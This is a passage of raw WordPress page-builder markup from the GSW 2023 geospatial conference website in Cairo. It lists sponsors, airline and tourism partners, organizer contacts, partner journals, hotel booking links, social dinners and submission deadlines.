src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" 